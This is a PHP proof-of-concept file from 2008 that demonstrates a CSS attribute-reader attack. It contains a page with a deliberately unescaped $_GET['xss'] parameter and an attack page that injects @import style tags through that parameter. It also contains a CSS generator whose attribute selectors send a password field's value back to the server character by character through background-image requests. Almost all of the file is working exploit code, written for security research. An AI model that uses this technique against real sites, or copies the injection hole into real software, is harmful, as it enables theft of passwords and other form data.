<?php
/***** BEGIN LICENSE BLOCK *****

CSSAR - A proof of concept of a CSS Attribute Reader

Copyright (C) 2008 Sirdarckcat

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

***** END LICENSE BLOCK *****/

    
if (isset($_GET['source'])) {
        
highlight_file(__FILE__);
        exit();
    }
    if(empty(
$_SERVER['QUERY_STRING'])){
?>
<html>
    <head>
        <title>CSS Attribute Reader Proof Of Concept</title>
    </head>
    <body>
        <iframe frameborder=0 name="fr" src="?logout" height="90%" width="100%"></iframe>
        <a href="?logout" target="fr"> RESTART </a>
    </body>
</html>
<?php
    
exit();
    }
    if(isset(
$_POST['pass'])){
        
session_start();
        
$_SESSION['knownvalue']=$_POST['pass'];
        
header("Refresh: 0");
        die();
    }
    
$file=basename(__FILE__);
    if(isset(
$_GET['css'])){
        
//ensure everything is loaded in order
        
sleep(1);
        if(!isset(
$_COOKIE['step']))
            
$_COOKIE['step']=0;
        if(
$_COOKIE['step']<$_GET['css']){
            
header("Location: ?".$_SERVER['QUERY_STRING']);
            exit();
        }
        
setcookie('step',$_COOKIE['step']+1);        
    }
    
$d=$_GET['d'];
    
$i=$_GET['i'];
    if(isset(
$_GET['logout'])){
        
session_start();
        
setcookie('step',$_COOKIE['step']=0);
        
session_destroy();
    }
    if(isset(
$_GET['read'])){
        
session_start();
        if(!isset(
$_SESSION['value']))header("Refresh: 1");
        die(
"The value is: ".(isset($_SESSION['value'])?"<b>".htmlentities($_SESSION['value'])."</b>":htmlentities($_SESSION['value_']." ... ".$_SESSION['_value'])));
    }
    if(isset(
$_GET['css'])){
        switch(
$d){
            case 
'reading':
                
session_start();
                
ob_start("ob_gzhandler");
                
header("Content-Type: text/css");
                
$value_=empty($_SESSION['value_'])?"":"\\0000".substr(chunk_split(bin2hex($_SESSION['value_']),2,"\\0000"),0,-5);
                
$_value=empty($_SESSION['_value'])?"":"\\0000".substr(chunk_split(bin2hex($_SESSION['_value']),2,"\\0000"),0,-5);

                for(
$i=16;$i<=127;$i++){
                    
$ce "\\0000".dechex($i);
                    echo 
'input[value^="'.$value_.$ce.'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}';
                    echo 
'input[value$="'.$ce.$_value.'"]+*{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}';
                    echo 
'input[value="'.$value_.$ce.$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_."%".dechex($i).$_value.'");}';
                    echo 
"\n";
                }
                echo 
'input[value="'.$value_.$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.$_value.'");}';
                echo 
'input[value="'.$value_.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.'");}';
                echo 
'input[value="'.$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$_value.'");}';
            break;
        }
    }else if(isset(
$_GET['backend'])){
        
session_start();
        switch(
$d){
            case 
'beg':
                
$_SESSION['value_'].=$i;
            break;
            case 
'end':
                
$_SESSION['_value']=$i.$_SESSION['_value'];
            break;
            case 
'fin':
                
$_SESSION['value']=$i;            
            break;
        }
    }else if(isset(
$_GET['attack'])){
?>
    <iframe src="?read" height="100%" frameborder=0 width="100%"></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=0%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=1%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=2%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=3%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=4%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=5%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>

<?php
    
}else{
        
session_start();
?>
<html>
    <head>
        <title>Start</title>
        <?php echo $_GET['xss'];?>
    </head>
    <body>
        <form method=POST action=?attack>
            Enter something here and press enter <input name="pass" type="password" maxlength=11 value="<?php echo htmlentities($_SESSION['knownvalue']); ?>"/>
            <p/><p/><p/>
        </form>
    </body>
</html>
<?php
    
}
?>